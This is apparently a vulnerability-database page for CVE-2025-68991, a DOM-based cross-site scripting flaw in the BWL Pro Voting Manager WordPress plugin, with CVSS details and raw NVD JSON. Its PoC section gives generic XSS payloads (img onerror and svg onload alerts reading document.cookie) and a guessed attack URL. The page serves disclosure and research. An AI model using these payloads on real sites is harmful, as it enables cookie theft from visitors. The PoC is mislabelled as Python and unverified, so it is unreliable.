Security Vulnerability Report
中文
CVE-2025-68991 CVSS 6.5 MEDIUM

CVE-2025-68991

Published: 2025-12-30 11:15:58
Last Modified: 2026-04-27 19:16:40

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in xenioushk BWL Pro Voting Manager bwl-pro-voting-manager allows DOM-Based XSS.This issue affects BWL Pro Voting Manager: from n/a through <= 1.4.9.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

BWL Pro Voting Manager <= 1.4.9 (所有受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-68991 PoC - DOM-based XSS in BWL Pro Voting Manager // Attack vector: Inject malicious JavaScript via plugin's vulnerable input field // Example payload that could trigger DOM XSS: const xssPayload = '<img src=x onerror=alert(document.domain)>'; // Alternative payload using SVG: const svgPayload = '<svg onload=alert(document.cookie)>'; // Typical attack scenario: // 1. Attacker crafts a malicious URL or input containing XSS payload // 2. Victim visits page with the crafted input // 3. Plugin's JavaScript reads the input and writes to DOM without sanitization // 4. Browser executes the injected JavaScript code // Example of vulnerable code pattern (simplified): // document.getElementById('voting-result').innerHTML = userInput; // Recommended PoC URL pattern: // https://target-site.com/?vote_id=<img src=x onerror=alert(document.cookie)>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68991", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:57.803", "lastModified": "2026-04-27T19:16:40.320", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in xenioushk BWL Pro Voting Manager bwl-pro-voting-manager allows DOM-Based XSS.This issue affects BWL Pro Voting Manager: from n/a through <= 1.4.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bwl-pro-voting-manager/vulnerability/wordpress-bwl-pro-voting-manager-plugin-1-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}